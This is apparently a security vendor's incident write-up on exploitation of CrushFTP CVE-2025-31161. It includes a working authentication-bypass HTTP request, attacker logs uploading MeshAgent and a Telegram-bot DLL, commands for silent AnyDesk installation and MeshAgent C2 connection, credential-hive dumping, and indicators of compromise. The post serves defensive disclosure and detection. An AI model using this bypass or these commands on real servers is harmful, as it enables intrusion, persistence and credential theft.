CrushFTP CVE-2025-31161 Auth Bypass and Post-Exploitation

Glitch effectGlitch effectGlitch effect
Glitch banner

TL;DR: CVE-2025-31161 is a critical severity vulnerability allowing attackers to control how user authentication is handled by CrushFTP managed file transfer (MFT) software. We strongly recommend patching immediately to avoid affected versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0. Successful exploitation of CVE-2025-31161 would give attackers admin level access across the CrushFTP application for further compromise. This blog outlines our re-created proof-of-concept for CVE-2025-31161 and attackers’ use of both legitimate and malicious RMM tooling for post-exploitation activities. 


Special thanks to Tim Kasper, Faith Stratton, Jose Oregon, Matt Anderson, Craig Sweeney, Alden Schmidt, Lindsey Welch, Harlan Carvey, Jamie Levy, and John Hammond for their contributions and support for this analysis.


On 3 April 2025, Huntress observed in-the-wild exploitation of CVE-2025-31161, an authentication bypass vulnerability in versions of the CrushFTP software. We uncovered further post-exploitation activity leveraging the MeshCentral agent and other malware that we will discuss in this writeup.  While doing some further analysis, we uncovered potential evidence of compromise as early as 30 March 2025, which seemed to be testing access, and did not spawn any external processes to CrushFTP.

In a recent post from the ShadowServer team, they state as of March 30 there were ~1,500 vulnerable instances of CrushFTP publicly exposed to the internet.



Figure 1: Tweet from Shadowserver Foundation on March 31, 2025


What is CVE-2025-31161? 

CVE-2025-31161 is a 9.8 CVSS critical severity vulnerability that affects how the CrushFTP file transfer application handles user authentication. At the time of writing, the NIST NVD entry states the description:

CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability in the S3 authorization header processing that allows authentication bypass. Remote and unauthenticated HTTP requests to CrushFTP with known usernames can be used to impersonate a user and conduct actions on their behalf, including administrative actions and data retrieval.

This vulnerability is patched and is mitigated in CrushFTP versions 11.3.1+ and 10.8.4+. Huntress has validated and confirmed the authentication bypass is prevented in patched versions. 

Please ensure your own installations of CrushFTP are updated to the latest versions. If your CrushFTP instance is publicly exposed to the open Internet, we strongly recommend you patch immediately.

Upon successful exploitation, an adversary may gain access to the administrator user account for the CrushFTP application, and leverage this to create new backdoor accounts, access files (upload and download), obtain code execution, and achieve full control of the vulnerable server.

The vulnerability was assigned a CVE on March 26, and the Shadowserver Foundation first reported CVE-2025-31161 exploitation activity on March 31. The exploitation of CVE-2025-31161 is indicative of a concerning trend that we’ve seen across several incidents, where threat actors are targeting MFT platforms as a way to deliver disruptive attacks. These platforms are typically external-facing and house sensitive enterprise data, making them a favorite for threat actors. As such, prompt patching is critical. Within our partner base we have seen 148 unique endpoints with the CrushFTP software installed as a service, with 95 of these running major versions 10 and 11.  Approximately 72 different companies within our customer base were currently running unpatched versions of CrushFTP.  Customers have been notified of the urgency to upgrade.

Numerous other security firms have discussed CVE-2025-31161 (hat tip to Rapid7 AttackerKB and Outpost24 amongst others) and thanks to their shared insights, Huntress was able to recreate a proof-of-concept (PoC) with ease. The core of this vulnerability is the S3 authentication functionality included as a part of CrushFTP. Due to logic bugs in the underlying source code (which Project Discovery did a fantastic job outlining), a mere Authorization header in an HTTP request is all that is needed to bypass authentication without valid username or password credentials.


Proof of concept 

Since the technical details of the proof of concept are already public and available, we have no concerns discussing the inner workings of our recreated proof-of-concept.

As stated, it boils down to just an HTTP request:

GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=1111 HTTP/1.1
Cookie: CrushAuth=1111111111_111111111111111111111111111111111

Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/

Connection: close

While this is a simple example to merely list users on the CrushFTP instance, it demonstrates the key components:

  • Backend functions are accessible and any administrative actions can be performed

  • A single cookie, CrushAuth must be provided

    • This does not have to be a valid CrushAuth cookie. The Project Discovery writeup discusses the typical structure of this value, but we have seen success with just a ~31 character string of alphanumeric characters.

    • The c2f HTTP parameter must match the last 4 values of the CrushAuth cookie.

  • The Authorization header relies on the specific string prefix AWS4-HMAC-SHA256, and the Credential field may be set to any valid CrushFTP user account name that does not include a tilde (~), followed by a forward slash (/).

    • You will most commonly see the username crushadmin as this is the typical default administrator for CrushFTP servers.

In testing, we observed the CrushAuth cookie must still be “known” to the CrushFTP instance -- so a second HTTP request may be necessary if a random/invalid value is forged.

This small proof-of-concept only demonstrates the web-based authentication bypass… further actions and exploitation would be expanded upon by the adversary. In the following sections, we will discuss the tradecraft and post-exploitation used by the threat actors leveraging this vulnerability in the wild.


Huntress observations 

Across our Huntress partner base, the CrushFTP software is most typically installed within its own program directory commonly placed at the root of a volume (i.e., C:\CrushFTP10 or C:\CrushFTP11, but seen at D:\, E:\, or other drive letters).

Inside of this directory is a CrushFTP.log file, which includes valuable information. In our testing, we used CrushFTP version 10.5.1_12. We have seen the CrushFTP.log file to be the most reliable source to determine the full running version number of the CrushFTP installation. As an example, you may see a log entry like the following:

SERVER|<TIMESTAMP>|Server Memory Stats: <......> :Version 10.5.1_12

If you are unsure of which CrushFTP installation version you are running, be sure to check this file. Additionally, you can review it for any signs of exploitation with some of the indicators we have observed below. These are the very few lines of logs we observed when testing the recreated authentication bypass referenced above:

ACCEPT|<TIMESTAMP>|[HTTP:1_<EPHEMERAL-PORT>:lookup:8080] Accepting connection from:
<ATTACKER-IP-ADDRESS>:<EPHEMERAL-PORT>
POST|<TIMESTAMP>|[HTTP:1
_<EPHEMERAL-PORT>:crushadmin:<ATTACKER-IP-ADDRESS>] WROTE: *HTTP/1.1 200 OK*

Bear in mind, this is only a test of bypassing authentication to act as the crushadmin user -- follow-on exploitation may look very different. There is nuance in what artifacts may be found in the logs, depending on the requests made-- if you see activity including the AWS4-HMAC-SHA256 Credential=crushadmin/ string, be sure to look around the entry to make sure there is no reference to a currentAuth cookie value. The currentAuth cookie is included in legitimate login sessions and is not used for the authentication bypass technique.

Additionally, we have seen log files present in the \logs\session_logs directory that may include further details for your own analysis if you believe you may have been compromised.

Here is one occurrence where the threat actor created a new admin account to use as a persistent backdoor:


Loading Gist...

There are a few things to call out in the log excerpt above:


  1. Note the first two lines, which match the pattern of our recreated PoC artifacts -- and the observed adversary IP address, 172.235.144[.]67.

  2. They leverage the setUserItem function to craft a new user with specified properties. In this case, the backdoor account name is Eaion6Mz.

  3. They change the new user’s password, likely so they could log in later with it.

  4. One neat trick, they set the new user’s last_login time to 06/08/2023 03:04:22 PM in an effort to hide the account and make it look like it was last used years ago.

On another affected host, we observed the threat actor upload and stage the MeshCentral agent to be leveraged for continued remote access, persistence, and further post-exploitation. Other incidents leveraged AnyDesk and one included more bespoke malware. 

We will discuss these in further details in the following sections.

Huntress has seen exploitation of CVE-2025-31161 across only four distinct hosts from four different companies. Three of these companies were hosted by the same MSP.  The types of companies affected ranged from marketing, retail, and semiconductors.  While there was only a small number of our customers that were affected, there are known to be 130,000 vulnerable instances left open and exposed to the Internet outside of our purview. Therefore the true impact of this vulnerability is still yet to be determined.


AnyDesk post-exploitation

On one host, Huntress observed a threat actor installing a malicious AnyDesk RMM instance post-exploitation, before moving to dump the SAM and System registry hives in an effort to harvest credentials.

The host appeared to be running a vulnerable version of CrushFTP; threat actors used CrushFTPService.exe in order to then install AnyDesk. The following commands were observed setting the stage for the AnyDesk install: 

cmd.exe /c "C:\windows\temp\msiinstall.exe --install "C:\windows\temp\Anydesk" --silent"

cmd.exe /c "echo licence_key123 | "C:\windows\temp\Anydesk\AnyDesk.exe" --register-licence"

cmd.exe /c "echo Anydesk@123 | "C:\windows\temp\Anydesk\AnyDesk.exe" --set-password"


Figure 2: Process detection for AnyDesk spawning from CrushFTPService.exe



Figure 3: Process detection for credential dumping with reg.exe


MeshAgent post-exploitation

On some hosts, the threat actor was observed deploying MeshAgent as part of the post-exploitation activity. MeshAgent is provided by legitimate open source remote monitoring platform MeshCentral, and has previously been used by threat actors for various remote access functionalities, like sending commands, maintaining persistence, and more. The following commands were observed staging the MeshCentral Agent installation:

From the CrushFTP log from one endpoint:

Accepting connection from: 2.58.56.16:50860
READ: *POST /WebInterface/function/ HTTP/1.1*
READ: *User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0)
Gecko/20100101 Firefox/136.0*
READ: *Content-Length: 783*
READ: *Cookie: CrushAuth=1743696851505_BooTB7cPKiinnZ4UBM7Jr819zyodaJ; currentAuth=odaJ*
READ: *Priority: u=0* READ: *command:openFile*
READ: *upload_path:/Windows/Temp/mesch.exe*
READ: *upload_size:3480944* READ: *upload_id:cisqUUw66Yte*
READ: *start_resume_loc:0* READ: *c2f:odaJ*
WROTE: *150 Opening BINARY data connection. Ready to write file /Windows/Temp/mesch.exe. S T O R*
WROTE: *HTTP/1.1 200 OK*
...
READ: *POST /WebInterface/function/ HTTP/1.1*
READ: *User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0*
READ: *Content-Length: 904* READ: *Cookie: CrushAuth=1743696851505_BooTB7cPKiinnZ4UBM7Jr819zyodaJ; currentAuth=odaJ*
READ: *command:closeFile*
READ: *upload_id:cisqUUw66Yte*
READ: *total_chunks:6* READ: *total_bytes:3480944*
READ: *filePath:/Windows/Temp/mesch.exe*
READ: *lastModified:1743685342000*
READ: *c2f:odaJ*
WROTE: *226-Upload File Size:3480944 bytes @ 1699K/sec. MD5=114c196c39c91575880a5012d06565b1*
WROTE: *226 Transfer complete. MD5=114c196c39c91575880a5012d06565b1 ("/Windows/Temp/mesch.exe" 3480944) STOR*
WROTE: *HTTP/1.1 200 OK*
WROTE: *Content-Length: 138*
WROTE: **
WROTE: *<?xml version="1.0" encoding="UTF-8"?> <commandResult><response></response><md5>114c196c39c91575880a5012d06565b1</md5></commandResult>* WROTE: *HTTP/1.1 200 OK*

Note the included use of a currentAuth cookie here -- this indicates the adversary had leveraged CVE-2025-31161 to bypass authentication, but then used their access to login with a legitimate session.

Once the file was on the endpoint, the following commands were observed via EDR telemetry:

C:\Windows\Temp\mesch.exe run

C:\Windows\Temp\mesch.exe b64exec cmVxdWlyZSgnd2luLWNvbnNvbGUnKS5oaWRlKCk7cmVxdWlyZSgnd2luLWRpc3BhdGNoZXInKS5jb25uZWN0KCczNjg3Jyk7

C:\Windows\Temp\mesch.exe -fullinstall

The base64 string in the second command decodes to: 

require('win-console').hide();require('win-dispatcher').connect('3530');

On other detected endpoints, the MeshAgent post-exploitation installation was identical to the above, but on another endpoint, the base64 string decoded to:

require('win-console').hide();require('win-dispatcher').connect('4204');

Soon after the MeshAgent was deployed, a console window was opened (see above), which then added a non-admin user (CrushUser) to the local administrators group:

Figure 4: Signals Showing Post-Exploitation Activities


Telegram bot malware analysis

Within this affected host’s CrushFTP.log file (notice the STOR command for uploading the malicious DLL):

READ: *POST /WebInterface/function/ HTTP/1.1*
READ: *User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0)
Gecko/20100101 Firefox/136.0*
READ: *Content-Length: 904*
READ: *Cookie: CrushAuth=1743696851505_BooTB7cPKiinnZ4UBM7Jr819zyodaJ; currentAuth=odaJ*
READ: *command:closeFile*
READ: *upload_id:SE13PFVmTlq0*
READ: *total_chunks:6*
READ: *total_bytes:4358656*
READ: *filePath:/Windows/Temp/d3d11.dll*
READ: *lastModified:1743586788000*
READ: *c2f:odaJ*
WROTE: *226-Upload File Size:4358656 bytes @ 2128K/sec. MD5=1ab5a915e306686a1c7bebd03563a977* WROTE: *226 Transfer complete.  MD5=1ab5a915e306686a1c7bebd03563a977 ("/Windows/Temp/d3d11.dll" 4358656) STOR*

After MeshAgent’s installation, another DLL was pulled onto the host. While we didn’t observe execution of this DLL we can gain some high level insight from it. It’s a large C++ binary that is an implementation of the open source library TgBot. Unfortunately, at this time we weren’t able to recover the bot token used by this particular sample as it is likely stored in an external configuration file.

Figure 5: C++ Classes in DLL

In addition to the sample being unstripped, there was also PDB information included which is a useful pivot to find more associated samples: 

Figure 6: PDB Information

This allowed us to find 3 more DLLs that are likely written by the same author, all of which were uploaded to VirusTotal within the last week.

  • 85a1bfebf2a5973ebecd6e5a58c8fab18edfead2c1680ec1e9cce902924c347e

  • f7c8be827f3bd98b30c5a8d23c1af77f3d0324a9ebcd90104134fc1971751ff7

  • be6cb5f80b33b9e97622d278a86a99e67b78ccab0b3e554b8430ae5969bcfc0e

While the true intent of this sample still isn’t clear, it is likely that the threat actors are making use of a Telegram bot to collect telemetry from infected hosts. This analysis will be updated as more information becomes available.


What is Huntress doing?

Post-exploitation efforts are already thoroughly covered by Huntress detection rules. In response to these intrusions specifically, we crafted detectors to find child processes invoked underneath the CrushFTP service executable:


Loading Gist...


For community members not yet protected with Huntress, there are two Sigma rules available in the public SigmaHQ repository for:

  1. Detecting “Remote Access Tool - MeshAgent Command Execution via MeshCentral

  2. Detecting “Remote Access Tool - AnyDesk Silent Installation

If you think you could be impacted, abuse our trial to quickly discover anything shady left behind.


Indicators of Compromise (IOCs)


Indicator

First Observed (YYYYMMDD)

Description

172.235.144[.]67

2025-04-03

Attacker IP Address

2.58.56[.]16

2025-04-03

Attacker IP Address

Eaion6Mz

2025-04-03

Backdoor Account Name

C:\Windows\Temp\d3d11.dll

be6cb5f80b33b9e97622d278a86a99e67b78ccab0b3e554b8430ae5969bcfc0e

2025-04-03

TgBot DLL

C:\Windows\Temp\mesch.exe

9036c92c3ca73cb6ec2da25035322554319288fd2f6db906413011873ad7e281

2025-04-03

MeshAgent Installer Binary


Share

Sign Up for Huntress Updates

Get insider access to Huntress tradecraft, killer events, and the freshest blog updates.

By submitting this form, you accept our Terms of Service & Privacy Policy
Oops! Something went wrong while submitting the form.
Huntress at work